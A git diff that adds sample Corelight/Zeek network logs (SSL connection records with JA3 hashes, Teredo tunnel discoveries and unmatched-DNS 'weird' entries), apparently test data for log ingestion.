+{"ts":"2018-08-03T23:39:01.016845Z","uid":"C6VJjjzMx90f3HNUf","id.orig_h":"192.168.0.54","id.orig_p":52834,"id.resp_h":"213.155.151.185","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","server_name":"play.google.com","resumed":false,"established":false,"cert_chain_fuids":["FWt5Rk2am8SMFZ8rej","FYMzas11KaGH4OGgBa","FFHT1T1i4TWy42jH0c"],"client_cert_chain_fuids":[],"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:01.026954Z","uid":"CkdguJ2GrZUkvQOtA4","id.orig_h":"192.168.0.51","id.orig_p":55038,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:01.067435Z","uid":"CKa2Gz1SLcWvB30Os","id.orig_h":"192.168.0.54","id.orig_p":52932,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.092663Z","uid":"Cqv0v74voZq9vwWlti","id.orig_h":"192.168.0.54","id.orig_p":52979,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.839859Z","uid":"Cjnpm7CdLMcoryUnc","id.orig_h":"192.168.0.54","id.orig_p":52404,"id.resp_h":"216.58.209.141","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","server_name":"accounts.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.900599Z","uid":"CxP9661U0VfSaZrJF1","id.orig_h":"192.168.0.54","id.orig_p":52531,"id.resp_h":"216.58.209.133","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.941116Z","uid":"C0jaG1VRFh1PZjXX1","id.orig_h":"192.168.0.53","id.orig_p":3317,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.996801Z","uid":"CxbVem0i9ZpsHNNxi","id.orig_h":"192.168.0.54","id.orig_p":52785,"id.resp_h":"213.155.151.150","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.037357Z","uid":"C5yxw31LIetY6XrERc","id.orig_h":"192.168.0.54","id.orig_p":52866,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.011991Z","uid":"CNPfs5270gPZYLbbRa","id.orig_h":"192.168.0.54","id.orig_p":52827,"id.resp_h":"213.155.151.154","id.resp_p":443,"server_name":"chrome.google.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:01.087930Z","uid":"CDKMtm1i5DbqaZfoc4","id.orig_h":"192.168.0.51","id.orig_p":49910,"id.resp_h":"63.245.217.161","id.resp_p":443,"server_name":"versioncheck-bg.addons.mozilla.org","resumed":false,"established":false,"ja3":"aa7f5e2ada5d7bb8a7dceed01f5ffd7c"} +{"ts":"2018-08-03T23:39:00.924939Z","uid":"CBVEBB3Lh5fCGwGAE7","id.orig_h":"192.168.0.54","id.orig_p":52600,"id.resp_h":"213.155.151.181","id.resp_p":443,"server_name":"play.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.965483Z","uid":"CzjZA12uQ3B6sLfqjd","id.orig_h":"192.168.0.53","id.orig_p":3357,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.051529Z","uid":"C7X7Tw4qeX91DIDNn6","id.orig_h":"192.168.0.54","id.orig_p":52907,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.922754Z","uid":"CE0Wc92IMTLbdzJ3yl","id.orig_h":"192.168.0.54","id.orig_p":52592,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.963174Z","uid":"Cyb0tR1crWQIBuwT6g","id.orig_h":"192.168.0.54","id.orig_p":52687,"id.resp_h":"216.58.209.133","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.973263Z","uid":"CXe80G1vbFwwdA2ggl","id.orig_h":"192.168.0.54","id.orig_p":52712,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.949967Z","uid":"CAW1Bq1BtR96eOYti","id.orig_h":"192.168.0.54","id.orig_p":52660,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.960115Z","uid":"C23r772npCiEnU2nl2","id.orig_h":"192.168.0.54","id.orig_p":52677,"id.resp_h":"213.155.151.181","id.resp_p":443,"server_name":"play.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.071442Z","uid":"Cg1Z9a1ATw3iY8Uv8i","id.orig_h":"192.168.0.54","id.orig_p":52947,"id.resp_h":"137.116.224.167","id.resp_p":443,"server_name":"a.config.skype.com","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:01.086608Z","uid":"C8mAwE3Z5Y51icGXd2","id.orig_h":"192.168.0.51","id.orig_p":48815,"id.resp_h":"63.245.217.114","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","server_name":"blocklist.addons.mozilla.org","resumed":false,"established":false,"ja3":"aa7f5e2ada5d7bb8a7dceed01f5ffd7c"} +{"ts":"2018-08-03T23:39:01.001217Z","uid":"CoTXTS1zkbVpLIMwD2","id.orig_h":"192.168.0.54","id.orig_p":52787,"id.resp_h":"213.155.151.152","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.011346Z","uid":"CFuubf2BgsK5UZMMUf","id.orig_h":"192.168.0.54","id.orig_p":52813,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.117640Z","uid":"CspU3r2a2VqT9EYQEi","id.orig_h":"192.168.0.54","id.orig_p":53037,"id.resp_h":"216.58.209.101","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.937350Z","uid":"CYWSSlHNB82oss731","id.orig_h":"192.168.0.54","id.orig_p":52651,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:00.962634Z","uid":"CSbf7G47QJTRyypGOk","id.orig_h":"192.168.0.53","id.orig_p":3353,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.083552Z","uid":"CnxwY03BSwrgkBdqCc","id.orig_h":"192.168.0.51","id.orig_p":40468,"id.resp_h":"63.245.215.95","id.resp_p":443,"server_name":"fhr.data.mozilla.com","resumed":false,"established":false,"ja3":"aa7f5e2ada5d7bb8a7dceed01f5ffd7c"} +{"ts":"2018-08-03T23:38:57.507837Z","uid":"ChohhymxF4itmVfK6","id.orig_h":"192.168.0.54","id.orig_p":64099,"id.resp_h":"108.160.165.9","id.resp_p":443,"resumed":false,"established":false,"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:00.975063Z","uid":"CDXjLZZ1QZnibMW03","id.orig_h":"192.168.0.54","id.orig_p":52703,"id.resp_h":"74.125.232.115","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","resumed":false,"established":false} +{"ts":"2018-08-03T23:39:01.005428Z","uid":"CAvNby3fI9HMg5OiPa","id.orig_h":"192.168.0.54","id.orig_p":52803,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.045876Z","uid":"CsNMC13iHSKCbdoLE9","id.orig_h":"192.168.0.54","id.orig_p":52903,"id.resp_h":"216.58.209.97","id.resp_p":443,"server_name":"lh4.googleusercontent.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:01.061066Z","uid":"CtGe4m4StnNHRsHj9j","id.orig_h":"192.168.0.54","id.orig_p":52925,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.086460Z","uid":"CsHfV82GRv4G3tROQ5","id.orig_h":"192.168.0.53","id.orig_p":3492,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.267199Z","uid":"Cbue0A2tFPPeWX5GE","id.orig_h":"192.168.0.54","id.orig_p":51771,"id.resp_h":"108.160.165.11","id.resp_p":443,"resumed":false,"established":false,"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:00.989197Z","uid":"CIBFn22OuUmAMEqV5f","id.orig_h":"192.168.0.54","id.orig_p":52752,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.065076Z","uid":"CYtjnL2hueNSgqauWl","id.orig_h":"192.168.0.54","id.orig_p":52926,"id.resp_h":"213.155.151.153","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients4.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.955479Z","uid":"CwLfDn1ArCBMEmj2t7","id.orig_h":"192.168.0.54","id.orig_p":52684,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.107180Z","uid":"CY9TKN5DKB5zDge6f","id.orig_h":"192.168.0.54","id.orig_p":53026,"id.resp_h":"216.58.209.101","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.122377Z","uid":"CAedwu1NSZh2eI0oEd","id.orig_h":"192.168.0.54","id.orig_p":53057,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.122377Z","uid":"CR0HWo3RxKLRdzwAb","id.orig_h":"192.168.0.54","id.orig_p":53062,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.969765Z","uid":"CyXFH33czgZ1awUAsf","id.orig_h":"192.168.0.54","id.orig_p":52713,"id.resp_h":"137.116.224.167","id.resp_p":443,"server_name":"a.config.skype.com","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:00.984954Z","uid":"CuiS8HKXJKUEGbL24","id.orig_h":"192.168.0.53","id.orig_p":3379,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.076012Z","uid":"C7ocDKcGdfT8sLNpi","id.orig_h":"192.168.0.51","id.orig_p":49893,"id.resp_h":"63.245.217.161","id.resp_p":443,"server_name":"versioncheck.addons.mozilla.org","resumed":false,"established":false,"ja3":"ce694315cbb81ce95e6ae4ae8cbafde6"} +{"ts":"2018-08-03T23:39:00.957981Z","uid":"CVbOdR13791HBeeam7","id.orig_h":"192.168.0.54","id.orig_p":52676,"id.resp_h":"213.155.151.153","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients4.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.008605Z","uid":"CcFcL03YYCkCosP7lj","id.orig_h":"192.168.0.54","id.orig_p":52815,"id.resp_h":"74.125.232.115","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.012593Z","uid":"CMg1LF463YSfnhCWr2","id.orig_h":"192.168.0.54","id.orig_p":52830,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.108726Z","uid":"Cx0ogq4lfmDG7DQUVe","id.orig_h":"192.168.0.54","id.orig_p":53023,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.034536Z","uid":"CQ14BN26pT0JGvcUeg","id.orig_h":"192.168.0.53","id.orig_p":3437,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.034536Z","uid":"CUClc91amc8eQeSuza","id.orig_h":"192.168.0.54","id.orig_p":52859,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.044659Z","uid":"CMWcFP23u6AkrdEfZh","id.orig_h":"192.168.0.54","id.orig_p":52898,"id.resp_h":"64.233.161.189","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","server_name":"12.client-channel.google.com","resumed":false,"established":false,"cert_chain_fuids":["FO8b6W2yJRpm2KXng6","FmnhOg1Eb8Eb2PmsP7","FneYmJiFUIxkgqpWc"],"client_cert_chain_fuids":[],"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:01.069973Z","uid":"ChWglr3KAZblx8vTR1","id.orig_h":"192.168.0.54","id.orig_p":52938,"id.resp_h":"213.155.151.152","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.085129Z","uid":"CqRVMl43u5sQROjmK9","id.orig_h":"192.168.0.54","id.orig_p":52966,"id.resp_h":"213.155.151.152","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"talkgadget.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.263340Z","uid":"CstFQx4BI1fg8CWVI1","id.orig_h":"192.168.0.54","id.orig_p":51785,"id.resp_h":"193.149.88.183","id.resp_p":443,"version":"TLSv10","cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","curve":"secp384r1","resumed":false,"established":false,"cert_chain_fuids":["FOjrklZl04wHbhdUd","FwoJPw4TdhPBlnv6Ea"],"client_cert_chain_fuids":[],"ja3":"06207a1730b5deeb207b0556e102ded2"} +{"ts":"2018-08-03T23:39:01.124145Z","uid":"C9FY9f3dBGwUJTUrsi","id.orig_h":"192.168.0.54","id.orig_p":53055,"id.resp_h":"216.58.209.141","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","server_name":"accounts.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:01.100860Z","uid":"CVAKdv11VMygyHMWoh","id.orig_h":"192.168.0.54","id.orig_p":53009,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:38:56.437867Z","uid":"CzzfiW35EGQRLBFouk","id.orig_h":"192.168.0.54","id.orig_p":62801,"id.resp_h":"108.160.166.138","id.resp_p":443,"version":"TLSv10","cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","curve":"secp256r1","resumed":false,"established":false,"cert_chain_fuids":["F5b5EIBsnFV30Bt5h","F2jv9r2b5CjPqT1eog","Fksb6730CMJUNZehec"],"client_cert_chain_fuids":[],"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:00.964107Z","uid":"Cy26oNvQBpiu1PEG","id.orig_h":"192.168.0.54","id.orig_p":52714,"id.resp_h":"108.160.166.139","id.resp_p":443,"resumed":false,"established":false,"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:01.113819Z","uid":"C19mag3BYc9imOhGF","id.orig_h":"192.168.0.54","id.orig_p":53043,"id.resp_h":"75.101.135.23","id.resp_p":443,"server_name":"www.hipchat.com","resumed":false,"established":false,"ja3":"d6d0268c238e629784c6440543062546"} +{"ts":"2018-08-03T23:39:01.145435Z","uid":"Cp6Jg83qPc3E7AZOpc","id.orig_h":"192.168.0.54","id.orig_p":53118,"id.resp_h":"23.53.58.73","id.resp_p":443,"version":"TLSv12","cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","server_name":"ads1.msads.net","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} diff --git a/Sample Data/Custom/Corelight/tunnel_20180803_16:39:01-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/tunnel_20180803_16:39:01-16:40:00-0700.log_ new file mode 100644 index 0000000000..fcf209b774 --- /dev/null +++ b/Sample Data/Custom/Corelight/tunnel_20180803_16:39:01-16:40:00-0700.log_ @@ -0,0 +1,4 @@ +{"ts":"2018-08-03T23:39:01.231971Z","uid":"Ct9xQdrkYT5FlOxzl","id.orig_h":"1.2.3.4","id.orig_p":0,"id.resp_h":"5.6.7.8","id.resp_p":0,"tunnel_type":"Tunnel::IP","action":"Tunnel::DISCOVER"} +{"ts":"2018-08-03T23:39:01.396052Z","uid":"Cf80KsDADsn4c7Koa","id.orig_h":"192.168.2.16","id.orig_p":3797,"id.resp_h":"65.55.158.80","id.resp_p":3544,"tunnel_type":"Tunnel::TEREDO","action":"Tunnel::DISCOVER"} +{"ts":"2018-08-03T23:39:01.394640Z","uid":"Cvvh1e10TgqGgOUKIh","id.orig_h":"192.168.2.16","id.orig_p":3797,"id.resp_h":"65.55.158.81","id.resp_p":3544,"tunnel_type":"Tunnel::TEREDO","action":"Tunnel::DISCOVER"} +{"ts":"2018-08-03T23:39:01.395376Z","uid":"C1fJIA1dasC4KZQJia","id.orig_h":"192.168.2.16","id.orig_p":3797,"id.resp_h":"83.170.1.38","id.resp_p":32900,"tunnel_type":"Tunnel::TEREDO","action":"Tunnel::DISCOVER"} diff --git a/Sample Data/Custom/Corelight/weird_20180803_16:37:08-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/weird_20180803_16:37:08-16:40:00-0800.log_ new file mode 100644 index 0000000000..124b3f5691 --- /dev/null +++ b/Sample Data/Custom/Corelight/weird_20180803_16:37:08-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:39:13.647521Z","uid":"CQD2crg8MC6F49C5j","id.orig_h":"192.168.0.54","id.orig_p":55876,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.738665Z","uid":"C0JVX11hOZh7OkJde","id.orig_h":"192.168.0.54","id.orig_p":52692,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.017032Z","uid":"CGiyum1LP1CMp9BHxk","id.orig_h":"192.168.0.54","id.orig_p":53896,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.482151Z","uid":"Cpjgez1CkpcVuykdce","id.orig_h":"192.168.0.54","id.orig_p":62854,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.618819Z","uid":"C3VAJ23UqZEzHYyXue","id.orig_h":"192.168.0.54","id.orig_p":51221,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.104309Z","uid":"CJHhaZVC5qMWg2qwa","id.orig_h":"192.168.0.51","id.orig_p":55632,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.139320Z","uid":"CAD0VE4FXms5a0BKc","id.orig_h":"192.168.0.54","id.orig_p":64469,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.721051Z","uid":"CyAEhqcg4EJFSCPUk","id.orig_h":"192.168.0.54","id.orig_p":51967,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.721051Z","uid":"CoL6EI3eliPezn7Wl9","id.orig_h":"192.168.0.54","id.orig_p":59742,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.731149Z","uid":"C6ZW154Lmt76lZ66s2","id.orig_h":"192.168.0.54","id.orig_p":62892,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.149545Z","uid":"CIOrQy37MEAaLDlOZ","id.orig_h":"192.168.0.54","id.orig_p":56759,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.565244Z","uid":"CsCj5yBqIrMLaqBc3","id.orig_h":"192.168.0.54","id.orig_p":63007,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.900170Z","uid":"CoA7KI24SqTJwKqsh5","id.orig_h":"192.168.0.54","id.orig_p":63986,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.126915Z","uid":"Co2Rql2UwCR236XBV2","id.orig_h":"192.168.0.51","id.orig_p":27861,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.509344Z","uid":"Cb6tPw1ZQnmoi6MPHg","id.orig_h":"192.168.0.54","id.orig_p":50427,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.692493Z","uid":"CGeCNH2Z3haF9U3iH3","id.orig_h":"192.168.0.54","id.orig_p":57086,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.633617Z","uid":"CW4nBn14nj3OxVI8vl","id.orig_h":"192.168.0.54","id.orig_p":64293,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.134981Z","uid":"COXwxj2KWBJ8dpjrHb","id.orig_h":"192.168.0.54","id.orig_p":57608,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.921087Z","uid":"CjTyva21Ysrv4721wa","id.orig_h":"192.168.0.54","id.orig_p":62624,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.020564Z","uid":"CZrAwR3WRPpT59Jhzj","id.orig_h":"192.168.0.54","id.orig_p":50317,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:13.813359Z","uid":"CDj6s44gehbdsquCt","id.orig_h":"192.168.0.54","id.orig_p":64550,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.064628Z","uid":"C2nKeO1iEYynlWg5jl","id.orig_h":"192.168.0.54","id.orig_p":64573,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.115174Z","uid":"C4bwBy425fKg5y5Me2","id.orig_h":"192.168.0.54","id.orig_p":49385,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.004552Z","uid":"CdDb5bp4FHi9eYur5","id.orig_h":"192.168.0.54","id.orig_p":54756,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.014645Z","uid":"Cq9cz81QuL7oSlSrr5","id.orig_h":"192.168.0.54","id.orig_p":59313,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.105992Z","uid":"CRInfC3CZLEuMGnxAa","id.orig_h":"192.168.0.54","id.orig_p":54453,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.089416Z","uid":"CJSuoP1cj1kCMlVM","id.orig_h":"192.168.0.54","id.orig_p":50222,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.055738Z","uid":"CWgxT72rk2FtqHCOu9","id.orig_h":"192.168.0.54","id.orig_p":55603,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.121589Z","uid":"CHdBUh29378048Zkdj","id.orig_h":"192.168.0.54","id.orig_p":63903,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.132006Z","uid":"CKHjIu4rpDMRbQ7sZ3","id.orig_h":"192.168.0.54","id.orig_p":58355,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.075536Z","uid":"Cc1bY3ZTk9anJLgyg","id.orig_h":"192.168.0.54","id.orig_p":52277,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.139906Z","uid":"CoK2bOZx6trgPATK3","id.orig_h":"192.168.0.54","id.orig_p":58722,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.016245Z","uid":"CmUw912bRjMpBW7Fz4","id.orig_h":"192.168.0.54","id.orig_p":49179,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} 